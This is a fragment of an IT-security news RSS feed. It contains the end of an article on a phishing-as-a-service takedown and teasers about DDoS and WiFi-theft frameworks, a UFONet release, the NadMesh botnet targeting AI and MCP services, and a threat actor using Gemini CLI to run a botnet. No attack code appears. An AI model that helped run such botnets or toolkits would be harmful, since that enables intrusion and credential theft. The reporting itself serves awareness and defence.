<p class="wp-block-paragraph">He argued that the very nature of software makes it all but impossible to shut down in a meaningful way.</p>



<p class="wp-block-paragraph">“Although this is malicious infrastructure, it is still software, and modern development and deployment practices make it relatively quick to rebuild or replicate,” he said. “Demand is likely to shift to competing providers, allowing the ecosystem to recover even if this particular operation has been disrupted.”</p>



<p class="wp-block-paragraph"><a href="https://www.malwarebytes.com/blog/authors/metallicamvp" target="_blank" rel="noreferrer noopener">Pieter Arntz</a>, malware intelligence researcher at Malwarebytes, agreed that the crackdown is disruptive but not definitive. </p>



<p class="wp-block-paragraph">“This appears to be more than a routine website seizure. The reporting points to a PhaaS platform with centralized infrastructure, subscription-style customers, and Microsoft 365 session theft / MFA-bypass tooling, so taking down the backend likely hurts many downstream affiliates at once. In that sense, it is a meaningful disruption to the phishing ecosystem, not just one campaign,” Arntz said.</p>



<p class="wp-block-paragraph">But, he added, “a rebrand or partial re-emergence is plausible, which is the historical pattern for PhaaS operations. Even if the core infrastructure is gone, the code, customer lists, and operator tradecraft can survive.”</p>



<p class="wp-block-paragraph">This means that customers and affiliates can shift to other phishing kits, he said, so it’s likely that the takedown will create a temporary decline in Kratos-specific activity, but probably not a lasting reduction in phishing overall.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/fvillanustre/" target="_blank" rel="noreferrer noopener">Flavio Villanustre</a>, CISO for the LexisNexis Risk Solutions Group, also concluded that the impact of this crackdown will be short-lived. </p>



<p class="wp-block-paragraph">“For each criminal organization that is dismantled, ten new ones pop out of nowhere. Unless there is a coordinated international effort by more than a few countries, this is a whack-a-mole exercise,” he said. “These are all loosely connected individuals and akin to a lernaean hydra, with two heads growing whenever you chop off one. Their leadership emerges from their lines organically without a real center of control. This makes it almost impossible to completely eliminate these criminal organizations.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Attack Framework Harvests WiFi Passwords and Launches Network Flooding Attacks]]></title>
<description><![CDATA[A newly uncovered Telegram-controlled attack framework, dubbed NULLZEREPTOOL, combines a functional DDoS engine with code for WiFi password extraction, wireless disruption, proxy rotation, and botnet tasking. Researchers found the Python source in a Pastebin post flagged on April 29, 2026, then i...]]></description>
<link>https://tsecurity.de/de/3685520/it-security-nachrichten/new-attack-framework-harvests-wifi-passwords-and-launches-network-flooding-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685520/it-security-nachrichten/new-attack-framework-harvests-wifi-passwords-and-launches-network-flooding-attacks/</guid>
<pubDate>Wed, 22 Jul 2026 09:27:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly uncovered Telegram-controlled attack framework, dubbed NULLZEREPTOOL, combines a functional DDoS engine with code for WiFi password extraction, wireless disruption, proxy rotation, and botnet tasking. Researchers found the Python source in a Pastebin post flagged on April 29, 2026, then identified an earlier version sharing the same hardcoded Telegram bot token, administrator ID, and […]</p>
<p>The post <a href="https://cyberpress.org/wifi-credential-theft-framework/">New Attack Framework Harvests WiFi Passwords and Launches Network Flooding Attacks</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Release: UFONet v2.0 - "R3DST4R!"...]]></title>
<description><![CDATA[Posted by psy on Jul 20Hi Community,

I am glad to present a new release of this tool:

   - https://ufonet.03c8.net

---------

"UFONet is a free software, P2P and cryptographic -disruptive toolkit-
that allows to perform DoS and DDoS attacks; on the Layer 7 (APP/HTTP)
through the exploitation o...]]></description>
<link>https://tsecurity.de/de/3682790/it-security-nachrichten/new-release-ufonet-v20-r3dst4r/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682790/it-security-nachrichten/new-release-ufonet-v20-r3dst4r/</guid>
<pubDate>Tue, 21 Jul 2026 08:08:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Posted by psy on Jul 20</p>Hi Community,<br>
<br>
I am glad to present a new release of this tool:<br>
<br>
   - <a rel="nofollow" href="https://ufonet.03c8.net/">https://ufonet.03c8.net</a><br>
<br>
---------<br>
<br>
"UFONet is a free software, P2P and cryptographic -disruptive toolkit-<br>
that allows to perform DoS and DDoS attacks; on the Layer 7 (APP/HTTP)<br>
through the exploitation of Open Redirect vectors on third-party<br>
websites to act as a botnet and on the Layer3 (Network) abusing the<br>
protocol."<br>
<br>
"It also works as an encrypted DarkNET to...<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheits-Recap: WordPress-, SonicWall- und SharePoint-0-Days sowie KI-Service-Angriffe]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Innerhalb weniger Tage häufen sich Server- und Endpunkt-Exploits: WordPress-Core-Codeausführung, SonicWall-SMA-Zero-Days und ein SharePoint-RCE wurden teils schon vor Patch-Verfügbarkeit in freier Wildbahn missbraucht. Dazu kommen ein OpenSSL-DoS mit nur 11 Bytes, ...]]></description>
<link>https://tsecurity.de/de/3682438/it-security-nachrichten/sicherheits-recap-wordpress-sonicwall-und-sharepoint-0-days-sowie-ki-service-angriffe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682438/it-security-nachrichten/sicherheits-recap-wordpress-sonicwall-und-sharepoint-0-days-sowie-ki-service-angriffe/</guid>
<pubDate>Tue, 21 Jul 2026 02:37:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Innerhalb weniger Tage häufen sich Server- und Endpunkt-Exploits: WordPress-Core-Codeausführung, SonicWall-SMA-Zero-Days und ein SharePoint-RCE wurden teils schon vor Patch-Verfügbarkeit in freier Wildbahn missbraucht. Dazu kommen ein OpenSSL-DoS mit nur 11 Bytes, neue Malware-Frameworks zur Abgreifung von Krypto-Seed-Phrasen und eine Botnet-Jagd auf öffentlich erreichbare KI-Services. Der Recap zeigt nicht nur, was […]</p>
<div><a href="https://www.it-boltwise.de/sicherheits-recap-wordpress-sonicwall-und-sharepoint-0-days-sowie-ki-service-angriffe.html">... den vollständigen Artikel <strong>»Sicherheits-Recap: WordPress-, SonicWall- und SharePoint-0-Days sowie KI-Service-Angriffe«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/sicherheits-recap-wordpress-sonicwall-und-sharepoint-0-days-sowie-ki-service-angriffe.html">Sicherheits-Recap: WordPress-, SonicWall- und SharePoint-0-Days sowie KI-Service-Angriffe</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-gestützter Botnet-Betrieb: Gemini CLI macht C&C-Operationen portierbar]]></title>
<description><![CDATA[LONDON / MÜNCHEN / LONDON (IT BOLTWISE) – Eine Untersuchung zeigt, wie ein russischsprachiger Angreifer mit der Gemini-CLI einer Künstlichen Intelligenz eine komplette Botnet- und Command-and-Control-Infrastruktur auslagert. Laut Analyse von 200 Sitzungslogs zwischen 19. März und 21. April 2026 e...]]></description>
<link>https://tsecurity.de/de/3681958/it-security-nachrichten/ki-gestuetzter-botnet-betrieb-gemini-cli-macht-cc-operationen-portierbar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681958/it-security-nachrichten/ki-gestuetzter-botnet-betrieb-gemini-cli-macht-cc-operationen-portierbar/</guid>
<pubDate>Mon, 20 Jul 2026 20:39:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-botnet-c2-portierbar-gemini-cli.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-botnet-c2-portierbar-gemini-cli.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-botnet-c2-portierbar-gemini-cli-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-botnet-c2-portierbar-gemini-cli-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-botnet-c2-portierbar-gemini-cli-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-botnet-c2-portierbar-gemini-cli-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-botnet-c2-portierbar-gemini-cli-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON / MÜNCHEN / LONDON (IT BOLTWISE) – Eine Untersuchung zeigt, wie ein russischsprachiger Angreifer mit der Gemini-CLI einer Künstlichen Intelligenz eine komplette Botnet- und Command-and-Control-Infrastruktur auslagert. Laut Analyse von 200 Sitzungslogs zwischen 19. März und 21. April 2026 erledigt die KI dabei nicht nur Code-Arbeit, sondern auch Migration, Debugging und Bot-Management. Besonders brisant: Das […]</p>
<div><a href="https://www.it-boltwise.de/ki-gestuetzter-botnet-betrieb-gemini-cli-macht-cc-operationen-portierbar.html">... den vollständigen Artikel <strong>»KI-gestützter Botnet-Betrieb: Gemini CLI macht C&amp;C-Operationen portierbar«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ki-gestuetzter-botnet-betrieb-gemini-cli-macht-cc-operationen-portierbar.html">KI-gestützter Botnet-Betrieb: Gemini CLI macht C&amp;C-Operationen portierbar</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-gestützter Botnet-Betrieb: Gemini-CLI liefert Angreifern ein portables C&C-„Baukasten“-Modell]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine neue Fallanalyse zeigt, wie ein einzelner Angreifer Künstliche Intelligenz mit Gemini-CLI nutzt, um ein Botnet aus acht PCs einer Zahnarztpraxis zu steuern. Entscheidend ist nicht nur die Automatisierung einzelner Schritte, sondern die extrem kompakte C&C-Architektur: ...]]></description>
<link>https://tsecurity.de/de/3681828/it-security-nachrichten/ki-gestuetzter-botnet-betrieb-gemini-cli-liefert-angreifern-ein-portables-cc-baukasten-modell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681828/it-security-nachrichten/ki-gestuetzter-botnet-betrieb-gemini-cli-liefert-angreifern-ein-portables-cc-baukasten-modell/</guid>
<pubDate>Mon, 20 Jul 2026 19:23:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-agent-botnet-c2-gemini.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-agent-botnet-c2-gemini.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-agent-botnet-c2-gemini-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-agent-botnet-c2-gemini-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-agent-botnet-c2-gemini-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-agent-botnet-c2-gemini-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ki-agent-botnet-c2-gemini-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine neue Fallanalyse zeigt, wie ein einzelner Angreifer Künstliche Intelligenz mit Gemini-CLI nutzt, um ein Botnet aus acht PCs einer Zahnarztpraxis zu steuern. Entscheidend ist nicht nur die Automatisierung einzelner Schritte, sondern die extrem kompakte C&amp;C-Architektur: Laut Analyse passen die kompletten Befehls- und Serverkomponenten in nur wenige Kilobytes, wodurch der Betrieb […]</p>
<div><a href="https://www.it-boltwise.de/ki-gestuetzter-botnet-betrieb-gemini-cli-liefert-angreifern-ein-portables-cc-baukasten-modell.html">... den vollständigen Artikel <strong>»KI-gestützter Botnet-Betrieb: Gemini-CLI liefert Angreifern ein portables C&amp;C-„Baukasten“-Modell«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ki-gestuetzter-botnet-betrieb-gemini-cli-liefert-angreifern-ein-portables-cc-baukasten-modell.html">KI-gestützter Botnet-Betrieb: Gemini-CLI liefert Angreifern ein portables C&amp;C-„Baukasten“-Modell</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian-Speaking Hacker Uses Google Gemini CLI to Control Botnet of Eight Dental Clinic PCs]]></title>
<description><![CDATA[A solo Russian-speaking threat actor known as “bandcampro” outsourced a chunk of their operations to Google’s open-source Gemini CLI artificial intelligence (AI) and commandeered a live botnet. The findings come from an analysis of 200 Gemini CLI session logs between…
Read more →
The post Russian...]]></description>
<link>https://tsecurity.de/de/3681037/it-security-nachrichten/russian-speaking-hacker-uses-google-gemini-cli-to-control-botnet-of-eight-dental-clinic-pcs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681037/it-security-nachrichten/russian-speaking-hacker-uses-google-gemini-cli-to-control-botnet-of-eight-dental-clinic-pcs/</guid>
<pubDate>Mon, 20 Jul 2026 13:39:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A solo Russian-speaking threat actor known as “bandcampro” outsourced a chunk of their operations to Google’s open-source Gemini CLI artificial intelligence (AI) and commandeered a live botnet. The findings come from an analysis of 200 Gemini CLI session logs between…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/russian-speaking-hacker-uses-google-gemini-cli-to-control-botnet-of-eight-dental-clinic-pcs/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/russian-speaking-hacker-uses-google-gemini-cli-to-control-botnet-of-eight-dental-clinic-pcs/">Russian-Speaking Hacker Uses Google Gemini CLI to Control Botnet of Eight Dental Clinic PCs</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian-Speaking Hacker Uses Google Gemini CLI to Control Botnet of Eight Dental Clinic PCs]]></title>
<description><![CDATA[A solo Russian-speaking threat actor known as "bandcampro" outsourced a chunk of their operations to Google's open-source Gemini CLI artificial intelligence (AI) and commandeered a live botnet.

The findings come from an analysis of 200 Gemini CLI session logs between March 19 and April 21, 2026,...]]></description>
<link>https://tsecurity.de/de/3680809/it-security-nachrichten/russian-speaking-hacker-uses-google-gemini-cli-to-control-botnet-of-eight-dental-clinic-pcs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680809/it-security-nachrichten/russian-speaking-hacker-uses-google-gemini-cli-to-control-botnet-of-eight-dental-clinic-pcs/</guid>
<pubDate>Mon, 20 Jul 2026 12:10:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A solo Russian-speaking threat actor known as "bandcampro" outsourced a chunk of their operations to Google's open-source Gemini CLI artificial intelligence (AI) and commandeered a live botnet.

The findings come from an analysis of 200 Gemini CLI session logs between March 19 and April 21, 2026, which found the threat actor using AI, among other things, to crack passwords, set up a residential]]></content:encoded>
</item>
<item>
<title><![CDATA[NadMesh Uses Shodan to Find and Hijack Exposed AI and MCP Infrastructure]]></title>
<description><![CDATA[A sharp structural shift has been identified in the botnet landscape. Security researchers at XLab have uncovered NadMesh, a Go-based botnet that has been spreading rapidly since early July 2026. This malware marks a distinct evolution from opportunistic worm behavior…
Read more →
The post NadMes...]]></description>
<link>https://tsecurity.de/de/3678904/it-security-nachrichten/nadmesh-uses-shodan-to-find-and-hijack-exposed-ai-and-mcp-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678904/it-security-nachrichten/nadmesh-uses-shodan-to-find-and-hijack-exposed-ai-and-mcp-infrastructure/</guid>
<pubDate>Sun, 19 Jul 2026 07:20:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sharp structural shift has been identified in the botnet landscape. Security researchers at XLab have uncovered NadMesh, a Go-based botnet that has been spreading rapidly since early July 2026. This malware marks a distinct evolution from opportunistic worm behavior…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/nadmesh-uses-shodan-to-find-and-hijack-exposed-ai-and-mcp-infrastructure/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/nadmesh-uses-shodan-to-find-and-hijack-exposed-ai-and-mcp-infrastructure/">NadMesh Uses Shodan to Find and Hijack Exposed AI and MCP Infrastructure</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NadMesh Uses Shodan to Find and Hijack Exposed AI and MCP Infrastructure]]></title>
<description><![CDATA[A sharp structural shift has been identified in the botnet landscape. Security researchers at XLab have uncovered NadMesh, a Go-based botnet that has been spreading rapidly since early July 2026. This malware marks a distinct evolution from opportunistic worm behavior toward an industrial-grade, ...]]></description>
<link>https://tsecurity.de/de/3678816/it-security-nachrichten/nadmesh-uses-shodan-to-find-and-hijack-exposed-ai-and-mcp-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678816/it-security-nachrichten/nadmesh-uses-shodan-to-find-and-hijack-exposed-ai-and-mcp-infrastructure/</guid>
<pubDate>Sun, 19 Jul 2026 05:37:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sharp structural shift has been identified in the botnet landscape. Security researchers at XLab have uncovered NadMesh, a Go-based botnet that has been spreading rapidly since early July 2026. This malware marks a distinct evolution from opportunistic worm behavior toward an industrial-grade, ROI-driven attack platform aimed squarely at Artificial Intelligence (AI) and Model Context […]</p>
<p>The post <a href="https://cybersecuritynews.com/nadmesh-uses-shodan/">NadMesh Uses Shodan to Find and Hijack Exposed AI and MCP Infrastructure</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NadMesh: Botnet jagt KI-Services nach Cloud-Keys und Kubernetes-Tokens]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Ein Go-Botnet namens NadMesh scannt gezielt exponierte KI-Dienste und versucht, über offene Schnittstellen an Cloud-Keys sowie Kubernetes-Token zu gelangen. Die Auswertung eines QiAnXin-XLab-Reports zeigt zahlreiche Inkonsistenzen in den eigenen Operator-Statistiken, aber k...]]></description>
<link>https://tsecurity.de/de/3676946/it-security-nachrichten/nadmesh-botnet-jagt-ki-services-nach-cloud-keys-und-kubernetes-tokens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676946/it-security-nachrichten/nadmesh-botnet-jagt-ki-services-nach-cloud-keys-und-kubernetes-tokens/</guid>
<pubDate>Fri, 17 Jul 2026 22:08:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Ein Go-Botnet namens NadMesh scannt gezielt exponierte KI-Dienste und versucht, über offene Schnittstellen an Cloud-Keys sowie Kubernetes-Token zu gelangen. Die Auswertung eines QiAnXin-XLab-Reports zeigt zahlreiche Inkonsistenzen in den eigenen Operator-Statistiken, aber klare Hinweise auf echte Ausnutzung. Besonders betroffen sind Faktoren, die Unternehmen oft zu spät absichern: öffentliche Docker-APIs, Jenkins-Schnittstellen und ungeschützte […]</p>
<div><a href="https://www.it-boltwise.de/nadmesh-botnet-jagt-ki-services-nach-cloud-keys-und-kubernetes-tokens.html">... den vollständigen Artikel <strong>»NadMesh: Botnet jagt KI-Services nach Cloud-Keys und Kubernetes-Tokens«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/nadmesh-botnet-jagt-ki-services-nach-cloud-keys-und-kubernetes-tokens.html">NadMesh: Botnet jagt KI-Services nach Cloud-Keys und Kubernetes-Tokens</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens]]></title>
<description><![CDATA[A Go botnet called NadMesh turned up in early July hunting exposed AI services, and the operator’s own dashboard claims 3,811 unique AWS keys. A Shodan harvester keeps the scan queue stocked with ComfyUI, Ollama, n8n, Open WebUI, Langflow, and…
Read more →
The post New NadMesh Botnet Hunts Expose...]]></description>
<link>https://tsecurity.de/de/3676727/it-security-nachrichten/new-nadmesh-botnet-hunts-exposed-ai-services-for-cloud-keys-and-kubernetes-tokens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676727/it-security-nachrichten/new-nadmesh-botnet-hunts-exposed-ai-services-for-cloud-keys-and-kubernetes-tokens/</guid>
<pubDate>Fri, 17 Jul 2026 19:38:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Go botnet called NadMesh turned up in early July hunting exposed AI services, and the operator’s own dashboard claims 3,811 unique AWS keys. A Shodan harvester keeps the scan queue stocked with ComfyUI, Ollama, n8n, Open WebUI, Langflow, and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-nadmesh-botnet-hunts-exposed-ai-services-for-cloud-keys-and-kubernetes-tokens/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-nadmesh-botnet-hunts-exposed-ai-services-for-cloud-keys-and-kubernetes-tokens/">New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens]]></title>
<description><![CDATA[A Go botnet called NadMesh turned up in early July hunting exposed AI services, and the operator's own dashboard claims 3,811 unique AWS keys.

A Shodan harvester keeps the scan queue stocked with ComfyUI, Ollama, n8n, Open WebUI, Langflow, and Gradio: the image generators, local model runners, a...]]></description>
<link>https://tsecurity.de/de/3676657/it-security-nachrichten/new-nadmesh-botnet-hunts-exposed-ai-services-for-cloud-keys-and-kubernetes-tokens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676657/it-security-nachrichten/new-nadmesh-botnet-hunts-exposed-ai-services-for-cloud-keys-and-kubernetes-tokens/</guid>
<pubDate>Fri, 17 Jul 2026 19:24:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A Go botnet called NadMesh turned up in early July hunting exposed AI services, and the operator's own dashboard claims 3,811 unique AWS keys.

A Shodan harvester keeps the scan queue stocked with ComfyUI, Ollama, n8n, Open WebUI, Langflow, and Gradio: the image generators, local model runners, and workflow builders that teams stand up fast and firewall late.

The intel feed behind that counter]]></content:encoded>
</item>
<item>
<title><![CDATA[New NadMesh Botnet Uses 20+ RCE Vectors to Hijack AI and MCP Infrastructure]]></title>
<description><![CDATA[NadMesh is a new, industrial‑grade Go‑based botnet that weaponizes more than 20 RCE vectors to hijack AI and MCP infrastructure at scale, combining autonomous scanning, exploit delivery, and credential harvesting in a single closed‑loop platform. In early July 2026, researchers…
Read more →
The p...]]></description>
<link>https://tsecurity.de/de/3675882/it-security-nachrichten/new-nadmesh-botnet-uses-20-rce-vectors-to-hijack-ai-and-mcp-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675882/it-security-nachrichten/new-nadmesh-botnet-uses-20-rce-vectors-to-hijack-ai-and-mcp-infrastructure/</guid>
<pubDate>Fri, 17 Jul 2026 13:22:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>NadMesh is a new, industrial‑grade Go‑based botnet that weaponizes more than 20 RCE vectors to hijack AI and MCP infrastructure at scale, combining autonomous scanning, exploit delivery, and credential harvesting in a single closed‑loop platform. In early July 2026, researchers…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-nadmesh-botnet-uses-20-rce-vectors-to-hijack-ai-and-mcp-infrastructure/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-nadmesh-botnet-uses-20-rce-vectors-to-hijack-ai-and-mcp-infrastructure/">New NadMesh Botnet Uses 20+ RCE Vectors to Hijack AI and MCP Infrastructure</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New NadMesh Botnet Uses 20+ RCE Vectors to Hijack AI and MCP Infrastructure]]></title>
<description><![CDATA[NadMesh is a new, industrial‑grade Go‑based botnet that weaponizes more than 20 RCE vectors to hijack AI and MCP infrastructure at scale, combining autonomous scanning, exploit delivery, and credential harvesting in a single closed‑loop platform. In early July 2026, researchers identified NadMesh...]]></description>
<link>https://tsecurity.de/de/3675852/it-security-nachrichten/new-nadmesh-botnet-uses-20-rce-vectors-to-hijack-ai-and-mcp-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675852/it-security-nachrichten/new-nadmesh-botnet-uses-20-rce-vectors-to-hijack-ai-and-mcp-infrastructure/</guid>
<pubDate>Fri, 17 Jul 2026 13:10:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>NadMesh is a new, industrial‑grade Go‑based botnet that weaponizes more than 20 RCE vectors to hijack AI and MCP infrastructure at scale, combining autonomous scanning, exploit delivery, and credential harvesting in a single closed‑loop platform. In early July 2026, researchers identified NadMesh as a high‑volume Go-written botnet that was aggressively deploying bot agents across internet‑facing […]</p>
<p>The post <a href="https://gbhackers.com/new-nadmesh-botnet/">New NadMesh Botnet Uses 20+ RCE Vectors to Hijack AI and MCP Infrastructure</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NadMesh Botnet Targets AI and MCP Servers With 20+ Remote Code Execution Vectors]]></title>
<description><![CDATA[Discovered in early July 2026, NadMesh identifies itself in code as “n4d mesh controller” and operates as a long‑lived, iteratively developed botnet rather than a one‑off worm outbreak. It is written in Go and integrates Scanning, exploitation, credential theft, and AI/MCP service intelligence co...]]></description>
<link>https://tsecurity.de/de/3675657/it-security-nachrichten/nadmesh-botnet-targets-ai-and-mcp-servers-with-20-remote-code-execution-vectors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675657/it-security-nachrichten/nadmesh-botnet-targets-ai-and-mcp-servers-with-20-remote-code-execution-vectors/</guid>
<pubDate>Fri, 17 Jul 2026 11:56:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
